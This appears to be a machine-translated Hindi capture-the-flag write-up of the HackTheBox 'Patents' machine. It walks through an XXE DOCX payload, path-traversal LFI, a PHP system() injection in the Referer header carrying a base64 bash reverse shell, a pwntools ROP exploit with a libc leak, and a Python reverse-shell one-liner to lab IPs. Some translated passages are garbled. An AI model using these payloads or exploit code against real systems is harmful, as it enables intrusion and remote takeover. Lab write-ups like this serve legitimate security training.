🎶 🕕 🏌️ HackTheBox। पासिंग पेटेंट्स। XXE DOCX, LFI से RCE, GIT और ROP- चेन फाइलों के माध्यम से 👩🏻‍🤝‍👨🏾 🍰 👋🏽

मैं HackTheBox साइट से आगे की प्रक्रिया के लिए भेजे गए समाधान प्रकाशित करना जारी रखता हूं ।

इस लेख में, हम DOCX दस्तावेजों को पीडीएफ में परिवर्तित करने के लिए XXE की सेवा में शोषण करते हैं, LCE के माध्यम से RCE प्राप्त करते हैं, GIT के इतिहास में खुदाई करते हैं और फ़ाइलों को पुनर्स्थापित करते हैं, pwntools का उपयोग करके ROP चेन की रचना करते हैं और एक छिपी हुई रूट फ़ाइल पाते हैं।

प्रयोगशाला का कनेक्शन वीपीएन के माध्यम से है। यह सलाह दी जाती है कि किसी कार्य कंप्यूटर या किसी होस्ट से कनेक्ट न करें जहां आपके लिए महत्वपूर्ण डेटा उपलब्ध है, क्योंकि आप एक निजी नेटवर्क पर ऐसे लोगों के साथ रहते हैं जो सूचना सुरक्षा के क्षेत्र में कुछ जानते हैं :)

संगठनात्मक जानकारी

, , Telegram . , , .

. , - , .

टोह

इस मशीन का आईपी एड्रेस 10.10.10.173 है, जिसे मैं / etc / मेजबानों में जोड़ता हूँ।

10.10.10.173    patents.htb

सबसे पहले, हम खुले बंदरगाहों को स्कैन करते हैं। चूंकि नैम्प के साथ सभी बंदरगाहों को स्कैन करने में लंबा समय लगता है, इसलिए मैं इसे पहले मैसकैन के साथ करूंगा। हम प्रति सेकंड 500 पैकेट की गति से tun0 इंटरफ़ेस से सभी टीसीपी और यूडीपी पोर्ट को स्कैन करते हैं।

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.173 --rate=500

अब, बंदरगाहों पर काम करने वाली सेवाओं के बारे में अधिक विस्तृत जानकारी के लिए, हम -ए विकल्प के साथ एक स्कैन चलाएंगे।

nmap -A patents.htb -p22,80,8888

होस्ट SSH सेवाओं और Apache वेब सर्वर को चलाता है, जिसमें पोर्ट 8888 एक अतुलनीय सेवा के लिए आरक्षित है। वेब देखते हैं।

DOCX दस्तावेजों के लिए साइट का डाउनलोड फॉर्म है।

XXE DOCX

बयान के अनुसार, हमारे दस्तावेज़ को पीडीएफ प्रारूप में परिवर्तित किया जाएगा। यह XXE के विचार का सुझाव देता है। मैंने यहां से एक उदाहरण लिया ।

इस प्रकार, इस उदाहरण में, होस्ट दूरस्थ सर्वर से xml दस्तावेज़ डाउनलोड करने का प्रयास करेगा। इस दस्तावेज़ को डाउनलोड करके, वह डाउनलोड किए गए xml दस्तावेज़ में निर्दिष्ट स्थानीय फ़ाइल को पढ़ेगा, इसे बेस 64 में एनकोड करेगा और एक अनुरोध पैरामीटर के रूप में एन्कोडेड फ़ाइल को पास करते हुए, फिर से हमारे सर्वर से संपर्क करेगा। यही है, इस पैरामीटर को डीकोड करने के बाद, हमें रिमोट मशीन से फाइल मिलती है।

लेकिन इस लोड को शब्द / डॉक्यूमेंट.एक्सएमएल पथ पर नहीं रखा जाना चाहिए। चूंकि ओपनएक्सएमएल एसडीके का उपयोग इस प्रकार के दस्तावेज़ के साथ काम करने के लिए किया जाता है, यह यहाँ और यहाँ से इस प्रकार है, सर्वर-साइड सॉफ्टवेयर वर्ड / डॉक्यूमेंट.एक्सएमएल, और कस्टमएक्सएमएल / आइटम 1.xml में डेटा की खोज करेगा। इसलिए, लोड को वहां रखा जाना चाहिए।

आइए एक डॉक्स दस्तावेज़ बनाएं और इसे ज़िप संग्रह के रूप में अनज़िप करें। उसके बाद, customXML डायरेक्टरी बनाएं और उसमें item1.xml फ़ाइल बनाएं। इसमें हम ऊपर की इमेज से कोड लिखेंगे, आईपी एड्रेस को अपने हिसाब से बदलेंगे। और हम दस्तावेज़ को वापस संग्रहित करते हैं।

अब स्थानीय वेब सर्वर चलाएं।

python3 -m http.server 80

और वर्तमान निर्देशिका में हम दूसरी xml फ़ाइल बनाते हैं, वांछित फ़ाइल के रूप में निर्दिष्ट / आदि / पासवार्ड।

और दस्तावेज़ को सर्वर पर अपलोड करें। वेब सर्वर के साथ चलने वाली विंडो में, हम रिवर्स कनेक्शन देखेंगे।

बेस 64 को डिकोड करें और वह फ़ाइल प्राप्त करें जिसका अनुरोध किया गया था।

इस तरह हम सर्वर पर फाइल पढ़ सकते हैं। आइए अपाचे कॉन्फ़िगरेशन फ़ाइलों को पढ़ें। ऐसा करने के लिए, dtd.xml बदलें और दस्तावेज़ के डाउनलोड को दोहराएं।

इसलिए हम उस निर्देशिका का पता लगाते हैं जिसमें साइट स्थित है। आइए कॉन्फ़िगरेशन फ़ाइल को पढ़ने का प्रयास करें।

और टिप्पणी कहती है कि भेद्यता के कारण फ़ाइल का नाम बदल दिया गया था। हम निश्चित रूप से इसे पेटेंट . htb / getPatent_alphav1.0.php संदर्भित करेंगे ।

इस पृष्ठ पर जाने और पथ को पास करने के लिए ../../../../../etc/passwd आईडी पैरामीटर के रूप में, "../" की सभी घटनाएं हमारी लाइन से हटा दी जाएंगी। आइए प्रत्येक पंक्ति "../" को "... / /" से प्रतिस्थापित करते हैं, इसलिए किसी अनुक्रम को हटाते समय, "../" अभी भी बना रहेगा।

और हम LFI पाते हैं।

प्रवेश बिंदु

आइए इससे आरसीई प्राप्त करने का प्रयास करें। सच कहूँ - यह मुश्किल था। तथ्य यह है कि इस तरह के एक दस्तावेज भेजते समय, हमें पीडीएफ डाउनलोड करने का प्रस्ताव नहीं मिला। अर्थात्, डिस्क्रिप्टर 2 का उपयोग किया गया था (पाठ रूप में नैदानिक और डीबग संदेश प्रदर्शित करने के लिए)। और हम उसकी ओर रुख कर सकते हैं। आइए बेस 64 में रिवर्स शेल को एनकोड करें:

/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.211/4321 0>&1;'

L2Jpbi9iYXNoIC1jICcvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjExLzQzMjEgMD4mMTsn

हम इसे डीकोड करेंगे और इसे php में सिस्टम फंक्शन में पास करेंगे। फ़ाइल अपलोड करते समय HTTP हेडर के रूप में कोड को पास करते हैं।

curl http://patents.htb/convert.php -F "userfile=@file.docx" -F 'submit=Generate PDF' --referer 'http://test.com/<?php system(base64_decode("L2Jpbi9iYXNoIC1jICcvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjExLzQzMjEgMD4mMTsn")); ?>'

नेटकैट चलाएं।

nc -lvp 4321

और अब दूसरे डिस्क्रिप्टर की ओर मुड़ते हैं।

curl http://patents.htb/getPatent_alphav1.0.php?id=....//....//....//....//....//....//....//proc//self//fd//2

हम वापस जुड़ जाते हैं।

जड़ १

स्क्रिप्ट सिस्टम को लोड करें लिनेपिस को स्थानांतरित करता है और आउटपुट का सावधानीपूर्वक विश्लेषण करता है। इसलिए हम एक डॉकटर कंटेनर में काम करते हैं।

हम हैश भी पाते हैं। लेकिन हैकिंग, हम कुछ नहीं करने के लिए आते हैं।

इसलिए, चल रही प्रक्रियाओं को ट्रैक करने के लिए pspy64 चलाएं । और हम प्रक्रिया को रूट के रूप में शुरू करते हैं, जिसमें पासवर्ड को पर्यावरण चर के रूप में पारित किया जाता है।

और स्थानीय रूप से इस पासवर्ड को दर्ज करके उपयोगकर्ता को बदलें।

जड़ २

देखते हैं कि यह स्क्रिप्ट क्या करती है।

हमें कुछ lfmserver पर एक टिप मिलती है, और उपयोगकर्ता नाम और पासवर्ड भी बचाते हैं। आइए सिस्टम में देखें lfm से संबंधित हर चीज के लिए।

और हम इस निर्देशिका में गिट रिपॉजिटरी पाते हैं।

चलो इस भंडार के साथ काम करते हैं।

आइए बदलावों का इतिहास देखें।

आइए बदलावों का इतिहास देखें। इसलिए हम देखते हैं कि तपस्या करने के लिए, एक निष्पादन योग्य फ़ाइल और विवरण जोड़ा गया था, और आखिरी में, उन्हें पहले ही हटा दिया गया था। फ़ाइलों को हटाने से पहले वापस रोल करते हैं।

git revert 7c6609240f414a2cb8af00f75fdc7cfbf04755f5

और हमारी निर्देशिका में एक निष्पादन योग्य फ़ाइल और विवरण दिखाई दिया।

यहां मैं पहले से ही फ़ाइल को उलटना शुरू करना चाहता था, लेकिन - हमारे पास एक गिट प्रोजेक्ट है! मुझे एक कमिट मिली जिसमें स्रोत कोड का उल्लेख था।

और फ़ाइलों को पुनर्स्थापित करते हैं।

git checkout 0ac7c940010ebb22f7fbedb67ecdf67540728123

उसके बाद हम सोर्स कोड ऑफ इंटरेस्ट, प्रोग्राम को और स्थानीय मशीन को लाइब्रेरी डाउनलोड करते हैं।

Rop

हमें कार्यक्रम में भेद्यता को खोजने और उसका फायदा उठाने की कोशिश करने की आवश्यकता है, मदद करने के लिए स्रोत कोड हैं। आइए एक बाइनरी फ़ाइल में सुरक्षा की जांच करें।

यही है, कैनरी और पीआईई गायब हैं, लेकिन स्टैक निष्पादन योग्य नहीं है। आइए आप के लिए सुविधाजनक डिकंपाइलर (मैं आईडीए प्रो 7.2 का उपयोग करता हूं) के साथ किसी भी डिसबंबलर में बाइनरी फ़ाइल खोलें और रिपॉजिटरी से स्रोत कोड के साथ विघटित कोड की तुलना करें।

सर्वर से कनेक्ट करने के लिए और checker.py फ़ाइल से डेटा का उपयोग करें, साथ ही साथ क्रेडेंशियल भी।

एक शोषण टेम्पलेट लिखें।

#!/usr/bin/python3

from pwn import *

context(os="linux", arch="amd64")
HOST = "127.0.0.1"
PORT = 8888
username = "lfmserver_user"
password = "!gby0l0r0ck$$!"

चलिए अब निवेदन का निर्धारण करते हैं। एप्लिकेशन लॉन्च करें।

आपको फ़ाइल और उसकी सामग्री के हैश को पथ भेजना होगा। उदाहरण के लिए, मैंने / आदि / मेजबानों को लिया।

टेम्प्लेट में निम्न कोड जोड़ें।

INPUTREQ = "CHECK /{} LFM\r\nUser={}\r\nPassword={}\r\n\r\n{}\n"
file = "/etc/hosts"
md5sum = "7d8fc74dc6cc8517a81a5b00b8b9ec32"
send_ = INPUTREQ.format(file,username, password, md5sum)

r = remote(HOST, PORT)
r.sendline(send_.encode())

r.interactive()

अब निष्पादित करें और 404 त्रुटि प्राप्त करें।

लॉग फ़ाइल देखें।

यह स्पष्ट है कि एप्लिकेशन किसी फ़ाइल की तलाश में है, चलो पथों के साथ खेलते हैं और ऐसी फ़ाइल निर्दिष्ट करें।

file = "../../../../../etc/hosts"

हम कोड निष्पादित करेंगे और हम कोई त्रुटि नहीं देखेंगे।

लेकिन urlencode के मामले में, हमें सर्वर से कोड 200 के साथ प्रतिक्रिया मिलती है!

file = "%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fhosts"

बहुत बढ़िया, आइए असहमति करने वाले के पास वापस जाएं। हम एक सफल सर्वर प्रतिसाद (लाइनों + F12) के बीच पाते हैं। और देखते हैं कि यह कहां तक पहुँचा है (एक्स)।

और हम पहले फ़ंक्शन पर जाते हैं, जहां बहुत शुरुआत में क्रेडेंशियल्स का सत्यापन होता है।

चलो विसंवाहक विंडो में चर लाइनों का नाम बदलकर डिकम्पाइलर में समझने में आसान बनाते हैं।

और कोड को 18-24 पंक्तियों में पार्स करना, निम्न को समझना: उपयोगकर्ता इनपुट का हिस्सा फ़ंक्शन sub_402DB9 में गिरता है, जहां स्ट्रिंग को चर नाम में परिवर्तित किया जाता है, जो तब पहुंच फ़ंक्शन में आता है, और यदि परिणाम नकारात्मक है, तो संदेश 404 आउटपुट है। इस प्रकार। चर नाम फ़ाइल का पथ होगा। चूंकि अनुरोध को urlencode एन्कोडिंग में भी संसाधित किया गया था, इसलिए यह फ़ंक्शन डिकोडिंग के लिए सबसे अधिक आवश्यक है।

लेकिन तथ्य यह है कि चर नाम, जहां डेटा स्थानांतरित किया गया है, एक सीमित आकार का है।

इस प्रकार, बफर अतिप्रवाह के लिए, हमें 0xA0 = 160 बाइट्स स्थानांतरित करने की आवश्यकता है। आइए कोड में 160 बाइट्स तक जोड़ने और फ़ाइल का पथ एन्कोडिंग करने का कार्य करते हैं। चूंकि हैश की गणना फ़ाइल की सामग्री से की जाती है, इसलिए आवश्यक है कि फ़ाइल पथ की अखंडता का उल्लंघन न करें, अर्थात, मुख्य पथ 0x00 बाइट्स जोड़ने के बाद।

लेकिन तथ्य यह है कि हमें सर्वर पर किसी भी फाइल से हैश जानना होगा, जो हमेशा उपलब्ध रहेगा और कभी नहीं बदलेगा। उदाहरण के लिए, / proc / sys / कर्नेल / randomize_va_space, और जैसा कि हम linPEAS के आउटपुट से याद करते हैं, ASLR सक्रिय है, अर्थात, हम हैश को जानते हैं।

फिर कोड बदलें।

#!/usr/bin/python3
from pwn import *

def append_and_encode(file, rop=b""):
    ret = b""
    path = (file + b"\x00").ljust(160, b"A") + rop
    for i in path:
        ret += b"%" + hex(i)[2:].rjust(2,"0").encode()
    return ret

context(os="linux", arch="amd64", log_level="error")

HOST = "127.0.0.1"
PORT = 8888
INPUTREQ = b"CHECK /{1} LFM\r\nUser=lfmserver_user\r\nPassword=!gby0l0r0ck$$!\r\n\r\n{2}\n"
md5sum = b"26ab0db90d72e28ad0ba1e22ee510510"

payload = append_and_encode(b"../../../../../proc/sys/kernel/randomize_va_space")
send_= INPUTREQ.replace(b"{1}", payload).replace(b"{2}", md5sum)
r = remote(HOST, PORT)
r.sendline(send_)
r.interactive()

यह सफलतापूर्वक काम करता है!

अब एक मेमोरी लीक का उपयोग करते हैं और उस पते को निर्धारित करते हैं जहां libc लाइब्रेरी भरी हुई है। ऐसा करने के लिए, हमें भरी हुई libc लाइब्रेरी में राइटिंग फंक्शन का पता मिलता है।

binary = ELF("./lfmserver")
libc = ELF("./libc6.so")

rop_binary = ROP(binary)
rop_binary.write(0x6, binary.got['dup2'])
rop = flat(rop_binary.build())

payload = append_and_encode(b"../../../../../proc/sys/kernel/randomize_va_space", rop)

अब dup2 फ़ंक्शन (पहले 8 बाइट्स) के पते का चयन करें। इसमें से अनलोड लाइब्रेरी में डुप 2 फ़ंक्शन के पते को घटाएं। यह libc का आधार पता ढूंढेगा।

print(f"[*] Payload sent")

recv_ = r.recvall().split(b'\r')
leak = u64(recv_[-1][:8])
print(f"[*] Leak address: {hex(leak)}")
libc.address = leak - libc.symbols['dup2']
print(f"[+] Libc base: {hex(libc.address)}")

अब लाइन / बिन / श का पता लगाएं।

shell_address = next(libc.search(b"/bin/sh\x00"))

यह आरओपी को इकट्ठा करने के लिए बना हुआ है, जिसमें मानक I / O विवरणकर्ता (0,1,2) प्रोग्राम में पंजीकृत विवरणक (6 ले) पर पुनर्निर्देशित किए जाएंगे। जिसके बाद सिस्टम फ़ंक्शन को बुलाया जाएगा, जहां हम लाइन / बिन / श के पते को पास करेंगे।

rop_libc = ROP(libc)
rop_libc.dup2(6,0)
rop_libc.dup2(6,1)
rop_libc.dup2(6,2)
rop_libc.system(shell_address)
rop = flat(rop_libc.build()) 

payload = append_and_encode(b"../../../../../proc/sys/kernel/randomize_va_space", rop)
send_ = INPUTREQ.replace(b"{1}", payload).replace(b"{2}", md5sum)
r = remote(HOST, PORT)
r.sendline(send_)

context.log_level='info'
r.recv()
r.sendline(b"id")

ठीक! हमें जड़ से खोल मिलता है। लेकिन वह जल्दी मर रहा है। श्रोता (nc -lvp 8765) को चलाएं और बैक कनेक्ट शेल को फेंक दें।

r.sendline(b'python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.66",8765));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'')

और हमारे पास एक स्थिर शेल है। मैं नीचे दिए गए चित्र में पूर्ण कोड देता हूं।

लेकिन हम रूट फ्लैग को नहीं पढ़ सकते ...

जड़ ३

Linpeas चलाने और आउटपुट को देखते हुए, हम दिलचस्प खंड पाते हैं, विशेष रूप से / dev / sda2।

आइये सभी ब्लॉक उपकरणों के बारे में जानकारी प्राप्त करते हैं।

इस प्रकार हमारे पास रूट विभाजन / देव / sda2 है। एक निर्देशिका बनाएं और विभाजन को माउंट करें।

तो हम रूट फ्लैग पाते हैं।

आप हमसे टेलीग्राम पर जुड़ सकते हैं । वहां आप दिलचस्प सामग्री, मर्ज किए गए पाठ्यक्रम, साथ ही सॉफ़्टवेयर पा सकते हैं। आइए एक समुदाय को एक साथ रखें जिसमें ऐसे लोग होंगे जो आईटी के कई क्षेत्रों में पारंगत हैं, फिर हम हमेशा किसी भी आईटी और सूचना सुरक्षा मुद्दों पर एक दूसरे की मदद कर सकते हैं।

HackTheBox। पासिंग पेटेंट्स। XXE DOCX, LFI से RCE, GIT और ROP- चेन फाइलों के माध्यम से

टोह

XXE DOCX

प्रवेश बिंदु

जड़ १

जड़ २

Rop

जड़ ३

More articles: